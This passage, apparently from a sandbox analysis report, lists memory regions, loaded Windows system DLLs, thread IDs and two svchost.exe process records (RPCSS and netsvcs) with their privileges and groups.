"\\Windows\\System32\\umpoext.dll" (normalized: "c:\\windows\\system32\\umpoext.dll") Region: id = 738 start_va = 0x7ffc53600000 end_va = 0x7ffc5361afff entry_point = 0x7ffc53600000 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 739 start_va = 0x7ffc53620000 end_va = 0x7ffc5363ffff entry_point = 0x7ffc53620000 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 740 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 741 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 742 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 743 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 744 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 745 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 746 start_va = 0x7ffc54370000 end_va = 0x7ffc54389fff entry_point = 0x7ffc54370000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 747 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 748 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 749 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 750 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 751 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 752 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 753 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 754 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 755 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 756 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 757 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 758 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 759 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 760 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 761 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 762 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 763 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 764 start_va = 0x7ffc57a30000 end_va = 0x7ffc57a9efff entry_point = 0x7ffc57a30000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 765 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 766 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3402 start_va = 0x7ffc4a430000 end_va = 0x7ffc4a442fff entry_point = 0x7ffc4a430000 region_type = mapped_file name = "srumapi.dll" filename = "\\Windows\\System32\\srumapi.dll" (normalized: "c:\\windows\\system32\\srumapi.dll") Thread: id = 116 os_tid = 0xc40 Thread: id = 117 os_tid = 0x434 Thread: id = 118 os_tid = 0x928 Thread: id = 119 os_tid = 0xab4 Thread: id = 120 os_tid = 0x508 Thread: id = 121 os_tid = 0x560 Thread: id = 122 os_tid = 0x44c Thread: id = 123 os_tid = 0x7f4 Thread: id = 124 os_tid = 0x7e4 Thread: id = 125 os_tid = 0x7e0 Thread: id = 126 os_tid = 0x7dc Thread: id = 127 os_tid = 0x3d8 Thread: id = 128 os_tid = 0x31c Thread: id = 129 os_tid = 0x314 Thread: id = 130 os_tid = 0x2b8 Thread: id = 131 os_tid = 0x2b4 Thread: id = 132 os_tid = 0x2a4 Thread: id = 133 os_tid = 0x2a0 Thread: id = 134 os_tid = 0x280 Thread: id = 135 os_tid = 0x260 Thread: id = 136 os_tid = 0x254 Thread: id = 137 os_tid = 0x240 Thread: id = 462 os_tid = 0x790 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47f8d000" os_pid = "0x268" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:000092ec" [0xc000000f], "LOCAL" [0x7] Region: id = 1627 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1628 start_va = 0x5c5a1b0000 end_va = 0x5c5a1bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c5a1b0000" filename = "" Region: id = 1629 start_va = 0x5c5a1c0000 end_va = 0x5c5a1c2fff entry_point = 0x5c5a1c0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1630 start_va = 0x5c5a1d0000 end_va = 0x5c5a1e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c5a1d0000" filename = "" Region: id = 1631 start_va = 0x5c5a1f0000 end_va = 0x5c5a26ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5a1f0000" filename = "" Region: id = 1632 start_va = 0x5c5a270000 end_va = 0x5c5a273fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c5a270000" filename = "" Region: id = 1633 start_va = 0x5c5a280000 end_va = 0x5c5a280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c5a280000" filename = "" Region: id = 1634 start_va = 0x5c5a290000 end_va = 0x5c5a291fff entry_point = 0x0 region_type = private name = "private_0x0000005c5a290000" filename = "" Region: id = 1635 start_va = 0x5c5a2a0000 end_va = 0x5c5a31ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5a2a0000" filename = "" Region: id = 1636 start_va = 0x5c5a320000 end_va = 0x5c5a326fff entry_point = 0x0 region_type = private name = "private_0x0000005c5a320000" filename = "" Region: id = 1637 start_va = 0x5c5a330000 end_va = 0x5c5a3edfff entry_point = 0x5c5a330000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1638 start_va = 0x5c5a3f0000 end_va = 0x5c5a3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c5a3f0000" filename = "" Region: id = 1639 start_va = 0x5c5a400000 end_va = 0x5c5a4fffff entry_point = 0x0 region_type = private name = "private_0x0000005c5a400000" filename = "" Region: id = 1640 start_va = 0x5c5a500000 end_va = 0x5c5a57ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5a500000" filename = "" Region: id = 1641 start_va = 0x5c5a580000 end_va = 0x5c5a580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c5a580000" filename = "" Region: id = 1642 start_va = 0x5c5a5e0000 end_va = 0x5c5a5e6fff entry_point = 0x0 region_type = private name = "private_0x0000005c5a5e0000" filename = "" Region: id = 1643 start_va = 0x5c5a600000 end_va = 0x5c5a6fffff entry_point = 0x0 region_type = private name = "private_0x0000005c5a600000" filename = "" Region: id = 1644 start_va = 0x5c5a700000 end_va = 0x5c5a7fffff entry_point = 0x0 region_type = private name = "private_0x0000005c5a700000" filename = "" Region: id = 1645 start_va = 0x5c5a800000 end_va = 0x5c5ab36fff entry_point = 0x5c5a800000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1646 start_va = 0x5c5ab40000 end_va = 0x5c5ac3ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5ab40000" filename = "" Region: id = 1647 start_va = 0x5c5ac40000 end_va = 0x5c5ad3ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5ac40000" filename = "" Region: id = 1648 start_va = 0x5c5ad40000 end_va = 0x5c5ae3ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5ad40000" filename = "" Region: id = 1649 start_va = 0x5c5ae40000 end_va = 0x5c5af3ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5ae40000" filename = "" Region: id = 1650 start_va = 0x5c5af40000 end_va = 0x5c5b03ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5af40000" filename = "" Region: id = 1651 start_va = 0x5c5b040000 end_va = 0x5c5b13ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5b040000" filename = "" Region: id = 1652 start_va = 0x5c5b140000 end_va = 0x5c5b23ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5b140000" filename = "" Region: id = 1653 start_va = 0x5c5b240000 end_va = 0x5c5b33ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5b240000" filename = "" Region: id = 1654 start_va = 0x5c5b340000 end_va = 0x5c5b43ffff entry_point = 0x0 region_type = private name = "private_0x0000005c5b340000" filename = "" Region: id = 1655 start_va = 0x5c5b500000 end_va = 0x5c5b5fffff entry_point = 0x0 region_type = private name = "private_0x0000005c5b500000" filename = "" Region: id = 1656 start_va = 0x5c5b600000 end_va = 0x5c5b6fffff entry_point = 0x0 region_type = private name = "private_0x0000005c5b600000" filename = "" Region: id = 1657 start_va = 0x7df5ff4c0000 end_va = 0x7ff5ff4bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff4c0000" filename = "" Region: id = 1658 start_va = 0x7ff6e0490000 end_va = 0x7ff6e0491fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0490000" filename = "" Region: id = 1659 start_va = 0x7ff6e0492000 end_va = 0x7ff6e0493fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0492000" filename = "" Region: id = 1660 start_va = 0x7ff6e0494000 end_va = 0x7ff6e0495fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0494000" filename = "" Region: id = 1661 start_va = 0x7ff6e0496000 end_va = 0x7ff6e0497fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0496000" filename = "" Region: id = 1662 start_va = 0x7ff6e0498000 end_va = 0x7ff6e0499fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0498000" filename = "" Region: id = 1663 start_va = 0x7ff6e049a000 end_va = 0x7ff6e049bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e049a000" filename = "" Region: id = 1664 start_va = 0x7ff6e049c000 end_va = 0x7ff6e049dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e049c000" filename = "" Region: id = 1665 start_va = 0x7ff6e049e000 end_va = 0x7ff6e049ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e049e000" filename = "" Region: id = 1666 start_va = 0x7ff6e04a0000 end_va = 0x7ff6e059ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e04a0000" filename = "" Region: id = 1667 start_va = 0x7ff6e05a0000 end_va = 0x7ff6e05c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e05a0000" filename = "" Region: id = 1668 start_va = 0x7ff6e05c3000 end_va = 0x7ff6e05c4fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e05c3000" filename = "" Region: id = 1669 start_va = 0x7ff6e05c5000 end_va = 0x7ff6e05c6fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e05c5000" filename = "" Region: id = 1670 start_va = 0x7ff6e05c7000 end_va = 0x7ff6e05c8fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e05c7000" filename = "" Region: id = 1671 start_va = 0x7ff6e05c9000 end_va = 0x7ff6e05cafff entry_point = 0x0 region_type = private name = "private_0x00007ff6e05c9000" filename = "" Region: id = 1672 start_va = 0x7ff6e05cb000 end_va = 0x7ff6e05ccfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e05cb000" filename = "" Region: id = 1673 start_va = 0x7ff6e05cd000 end_va = 0x7ff6e05cefff entry_point = 0x0 region_type = private name = "private_0x00007ff6e05cd000" filename = "" Region: id = 1674 start_va = 0x7ff6e05cf000 end_va = 0x7ff6e05cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e05cf000" filename = "" Region: id = 1675 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1676 start_va = 0x7ffc48880000 end_va = 0x7ffc48895fff entry_point = 0x7ffc48880000 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 1677 start_va = 0x7ffc50980000 end_va = 0x7ffc509e7fff entry_point = 0x7ffc50980000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1678 start_va = 0x7ffc51410000 end_va = 0x7ffc5141ffff entry_point = 0x7ffc51410000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1679 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1680 start_va = 0x7ffc532b0000 end_va = 0x7ffc532e1fff entry_point = 0x7ffc532b0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1681 start_va = 0x7ffc532f0000 end_va = 0x7ffc53371fff entry_point = 0x7ffc532f0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1682 start_va = 0x7ffc53380000 end_va = 0x7ffc53392fff entry_point = 0x7ffc53380000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1683 start_va = 0x7ffc533a0000 end_va = 0x7ffc533b6fff entry_point = 0x7ffc533a0000 region_type = mapped_file name = "rpcepmap.dll" filename = "\\Windows\\System32\\RpcEpMap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll") Region: id = 1684 start_va = 0x7ffc533c0000 end_va = 0x7ffc5349afff entry_point = 0x7ffc533c0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1685 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1686 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1687 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1688 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1689 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1690 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1691 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1692 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1693 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1694 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1695 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1696 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1697 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1698 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1699 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1700 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1701 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1702 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1703 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1704 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1705 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 138 os_tid = 0xa40 Thread: id = 139 os_tid = 0x270 Thread: id = 140 os_tid = 0x6b0 Thread: id = 141 os_tid = 0x614 Thread: id = 142 os_tid = 0x608 Thread: id = 143 os_tid = 0x520 Thread: id = 144 os_tid = 0x344 Thread: id = 145 os_tid = 0x300 Thread: id = 146 os_tid = 0x29c Thread: id = 147 os_tid = 0x294 Thread: id = 148 os_tid = 0x288 Thread: id = 149 os_tid = 0x284 Thread: id = 150 os_tid = 0x27c Thread: id = 151 os_tid = 0x26c Thread: id = 463 os_tid = 0xda4 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3daed000" os_pid = "0x324" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b5ca" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 959 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 960 start_va = 0xb42eea0000 end_va = 0xb42eeaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42eea0000" filename = "" Region: id = 961 start_va = 0xb42eeb0000 end_va = 0xb42eeb0fff entry_point = 0xb42eeb0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 962 start_va = 0xb42eec0000 end_va = 0xb42eed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42eec0000" filename = "" Region: id = 963 start_va = 0xb42eee0000 end_va = 0xb42ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000b42eee0000" filename = "" Region: id = 964 start_va = 0xb42ef60000 end_va = 0xb42ef63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42ef60000" filename = "" Region: id = 965 start_va = 0xb42ef70000 end_va = 0xb42ef70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42ef70000" filename = "" Region: id = 966 start_va = 0xb42ef80000 end_va = 0xb42ef81fff entry_point = 0x0 region_type = private name = "private_0x000000b42ef80000" filename = "" Region: id = 967 start_va = 0xb42ef90000 end_va = 0xb42f00ffff entry_point = 0x0 region_type = private name = "private_0x000000b42ef90000" filename = "" Region: id = 968 start_va = 0xb42f010000 end_va = 0xb42f016fff entry_point = 0x0 region_type = private name = "private_0x000000b42f010000" filename = "" Region: id = 969 start_va = 0xb42f020000 end_va = 0xb42f0ddfff entry_point = 0xb42f020000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 970 start_va = 0xb42f0e0000 end_va = 0xb42f0e0fff entry_point = 0x0 region_type = private name = "private_0x000000b42f0e0000" filename = "" Region: id = 971 start_va = 0xb42f0f0000 